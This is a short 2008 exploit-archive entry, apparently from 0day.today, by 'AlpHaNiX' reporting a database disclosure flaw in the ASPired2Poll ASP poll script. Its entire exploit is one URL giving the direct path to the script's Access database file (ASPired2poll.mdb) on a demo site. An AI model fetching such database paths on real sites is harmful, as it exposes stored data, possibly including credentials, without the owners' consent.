id: 4422
date: 12/11/2008
title: The Net Guys ASPired2Poll Remote Database Disclosure Vulnerability
author: AlpHaNiX
cves: 

==================================================================
The Net Guys ASPired2Poll Remote Database Disclosure Vulnerability
==================================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : ASPired2poll
#download : null
#Demo     : http://thenetguys.us/ASPired2/Poll/


###########################################################################

#Exploits :

--=[DATABASE DISCLOSURE]=--

http://thenetguys.us/ASPired2/Poll/ASPired2poll.mdb


###########################################################################



#  0day.today [2023-03-25]  #